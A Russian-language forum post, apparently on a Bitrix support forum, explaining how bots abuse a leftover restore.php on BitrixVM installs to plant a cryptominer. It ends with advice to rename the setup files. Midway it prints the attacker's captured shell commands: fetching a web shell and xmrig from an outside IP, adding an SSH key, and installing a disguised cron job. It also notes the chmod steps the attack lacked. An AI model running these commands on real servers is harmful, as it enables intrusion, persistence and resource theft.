[QUOTE] написал:
[QUOTE] написал:
Вы не учитываете тот случай, когда вирус может находится в программах вашего компьютера, например, файловый менеджер и так далее.[/QUOTE]
Еще раз.
Получил образ оф. BitrixVM, Арендовал хост, Развернул полученный образ без каких-либо изменений в конфигурацию. На сайт не заходили, На хостинг не заходили, На сервер не заходили.
Залился майнер. Почистил через консоль на хостинге, никаких файловых менеджеров winscp, ssh и прочего. Вышел. Прошла неделя майнер снова там.[/QUOTE]
Возможно еще актуально.
При установке битрикс-окружения в /home/bitrix/www появляются restore.php и bitrixsetup.php
Они же создаются при создании сайта средствами /root/menu.sh
Файл restore.php позволяет восстановить из предварительно созданного бэкапа сайт.
Для развертывания никаких логинов паролей (в том числе и от пользователя сервера баз данных) не надо.
Что происходит?
Приходит робот из облака гугла или амазона.
Видит restore.php.
Разворачивает заранее сделанную копию сайта.
Идет в админку.
Это его сайт и у него есть возможность попасть в админку.
Запускает "командную строку php"
В ней:
echo shell_exec("cat /proc/cpuinfo | grep processor");
echo shell_exec("cat /proc/cpuinfo | grep model");
echo shell_exec("sudo -l");
echo shell_exec("curl -O [URL=http://178.154.215.30/auth_login)]http://178.154.215.30/auth_login")[/URL];
echo shell_exec("mv auth_login auth_login.php");
echo shell_exec("ls /home/bitrix/www/bitrix/admin/ | grep auth_login.php");
echo shell_exec("cp /home/bitrix/www/bitrix/admin/auth_login.php /home/bitrix/www/");
echo shell_exec("ls /home/bitrix/www/ | grep auth_login.php");
echo shell_exec("curl -o /tmp/config.json [URL=http://178.154.215.30/config.json)]http://178.154.215.30/config.json")[/URL];
echo shell_exec("curl -o /tmp/xmrig [URL=http://178.154.215.30/xmrig)]http://178.154.215.30/xmrig")[/URL];
echo shell_exec("chmod 777 /tmp/xmrig");
echo shell_exec("mkdir /home/bitrix/.ssh");
echo shell_exec("curl -O [URL=http://178.154.215.30/info)]http://178.154.215.30/info")[/URL];
echo shell_exec("cat info >> ~/.ssh/authorized_keys");
echo shell_exec("rm -rf info ");
echo shell_exec("curl -o /home/bitrix/sql_backup.sql [URL=http://178.154.215.30/sql_backup)]http://178.154.215.30/sql_backup")[/URL];
echo shell_exec("chmod 777 /home/bitrix/sql_backup.sql");
echo shell_exec("curl -O [URL=http://178.154.215.30/conf)]http://178.154.215.30/conf")[/URL];
echo shell_exec("crontab -l >> conf");
echo shell_exec("crontab conf");
echo shell_exec("rm -rf conf");
echo shell_exec("crontab -l");
После этого:
$ crontab -l
# kletka-gym project
*/10 * * * * bash /home/bitrix/sql_backup.sql
а там внутри
wget -P /tmp [URL=https://github.com/.../xmrig-6.16.2-linux-static-x64.tar.gz]https://github.com/.../xmrig-6.16.2-linux-static-x64.tar.gz[/URL]
И еще чуть-чуть конфигов.
Вот как-то так.
Снято в 22 году с работающего майнера.
Замечу что в данном случае после
echo shell_exec("cat info >> ~/.ssh/authorized_keys");
не хватает chmod 700 для .ssh и chmod 600 для authorized_keys
Для получения ssh по ключу.
Тогда майнер был не доработан.
Возникает вопрос что делать?
После установки битрикс-окружения/развертывания bitrix-vm
cd /home/bitrix/www
mv bitrixsetup.php bitrixsetup.php.1
mv restore.php restore.php.1
То же самое делать сразу же после создания сайта в его web_root.